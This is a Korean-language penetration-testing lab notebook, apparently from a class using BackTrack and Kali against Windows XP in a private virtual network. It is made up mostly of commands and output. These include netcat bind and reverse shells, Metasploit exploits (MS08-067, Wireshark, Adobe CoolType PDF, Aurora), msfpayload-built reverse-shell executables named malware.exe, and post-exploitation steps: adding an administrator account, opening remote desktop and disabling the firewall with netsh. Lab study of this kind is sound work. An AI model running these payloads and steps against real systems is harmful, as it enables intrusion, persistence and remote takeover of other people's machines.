BackTrack 사용해보기
-- 순서 --
1. BT SSH 오픈
2. BT WEB 오픈
3. nc.exe windows 복사
4. nc 연습
1. BT SSH 오픈
- ssh 키 생성
- SSH포트(22) 확인
# sshd-generate
# ls /etc/ssh
# /etc/init.d/ssh start
# passwd
# ifconfig eth1
Xshell 로 로그인
2. BT WEB 오픈
- 웹포트(80) 확인
- nc.exe 를 web root 디렉토리에 복사
# /etc/init.d/apach2 start
# netstat -nltp
# cp /pentest/windows-binaries/tools/nc.exe /var/www
3. nc.exe windows 복사
explorer 를 실행해서
http://BT/nc.exe
nc.exe 를 C:\에 저장한다
4. nc 연습
- bind shell
V : windows , A : bt
c:\> nc -l -v -p 8000
# nc 192.168.56.201 8000
c:\> nc -l -v -p 8000 -e cmd.exe
# nc 192.168.56.201 8000
- reverse shell
# nc -lvp 8000
c:\> nc 192.168.56.101 8000 -e cmd.exe
msfconsole ( 그냥 Kali에서 함 )
1. 공격모듈 선택
2. 공격 패이로드 선택
3. 옵션 설정
4. 공격
윈도우 XP 파일 및 프린터 공유 관련 서비스 취약점을 이용한 공격
0. 공격대상 Windows XP -> 방화벽 내려주자
그리고 네트워크 설정에서 Microsoft 네트워크용 파일 및 프린터 공유에 체크가 되어있어야 한다
1. 공격모듈 선택/옵션 설정
# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.201
msf exploit(ms08_067_netapi) > show options
2. 공격 패이로드 선택/옵션 설정
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.201 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.56.101 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
3. 공격
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.101:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Korean
[*] Selected Target: Windows XP SP3 Korean (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.56.201
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter 로컬 영역 연결:
Connection-specific DNS Suffix . : local
IP Address. . . . . . . . . . . . : 10.0.2.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.2.2
Ethernet adapter 로컬 영역 연결 2:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.56.201
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\WINDOWS\system32>
(다시 백트랙에서함)
# /etc/init.d/apache2 restart
# cd /var/www
# cp /pentest/windows-binaries/tools/wget.exe .
payload를 바꾸어 파일 업르도 시킴
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.56.201
set LHOST 192.168.56.200
exploit
meterpreter > upload /var/www/wget.exe c:\\
[*] uploading : /var/www/wget.exe -> c:\
[*] uploaded : /var/www/wget.exe -> c:\\wget.exe
(한글이 깨져 보이는건 인코딩 때문인데 백트랙 터미널 설정에서 인코딩을 변경해주면 한글도 제대로 볼 수 있다)
취약한 프로그램(Wireshark 취약 버전) 사용하는 Windows XP 공격
Windows XP에 설치
백트랙으로 공격
use exploit/multi/misc/wireshark_lwres_getaddrbyname
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.200
set RHOST 192.168.56.201
set target 4
show options
exploit
(Windows XP에서 취약한 Wireshark를 이용하여 패킷 캡처중이어야 한다)
pdf 취약점.
1. 공격모듈 선택
2. 공격 패이로드 선택
3. 옵션 설정
4. 공격
Windows XP에 취약한 adobe reader가 설치 되어있어야 한다.
use exploit/windows/browser/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set URIPATH test.html
set lhost 192.168.56.101
exploit
Windows XP에서 접속
http://192.168.56.101:8080/test.html
BackTrack에서 확인
sessions -l
sessions -i 1
shell
ipconfig
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
exploit
quit
mv ~/.msf4/local/msf.pdf /var/www
(msfconsole은 대화형이고
msfcli는 커맨드라인인터페이스형임)
msfcli exploit/multi/handler \
> PAYLOAD=windows/meterpreter/reverse_tcp \
> LHOST=192.168.56.101 E
XP에서 접속
http://192.168.56.101/msf.pdf
BackTrack에서 확인
################
## msfpayload ##
################
msfpayload -h
Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
OPTIONS:
-h Help banner
-l List available payloads
# msfpayload windows/shell_reverse_tcp O
(옵션의 O 임)
# msfpayload windows/shell_reverse_tcp \
> LHOST=192.168.56.101 X > /var/www/malware.exe
# msfconsole
use exploit/multi/handler
set payload windows/shell_reverse_tcp
show options
set LHOST 192.168.56.101
exploit
XP에서 접속
http://192.168.56.101/malware.exe
만든 악성 파일 다운
실행함
BackTrack에서 확인
ipconfig
이번엔 meterpreter로 만들어봄
# msfpayload windows/meterpreter/reverse_tcp O
# msfpayload windows/meterpreter/reverse_tcp \
> LHOST=192.168.56.101 X > /var/www/malware2.exe
# ls -l /var/www/malware2.exe
-rw-r--r-- 1 root root 73802 2014-06-20 06:54 /var/www/malware2.exe
# file /var/www/malware2.exe
/var/www/malware2.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
# msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
exploit
XP에서 접속
http://192.168.56.101/malware2.exe
저장
실행
백트랙에서 확인
shell
ipconfig
참고 : MS10-002 취약점
use exploit/windows/browser/ms10_002_aurora
set payload windows/meterpreter/reverse_tcp
set URIPATH test.html
set lhost 192.168.56.101
exploit
XP에서 접속
http://192.168.56.101:8080/test.html
sessions -l
sessions -i 1
ps
migrate 1160
shell
net user test test1234 /add
net localgroup administrators test /add
exit
run getgui -e -f 8090
(putty나 xshell로 원격 접속 중에는 안된다
백트랙 콘솔창에서 실행하자)
터미널 창을 하나 더 열어서
rdesktop localhost:8090
이런 Reverse / Bind 악성 코드와 루트킷은
Iceword, gmer 로 탐지한다.
cmd 명령어 중 방화벽 사용 중지 하고
방화벽 룰을 추가하는 명령어
netsh firewall set opmode disable(enable)
netsh firewall set portopening TCP 3500 "NATE oN"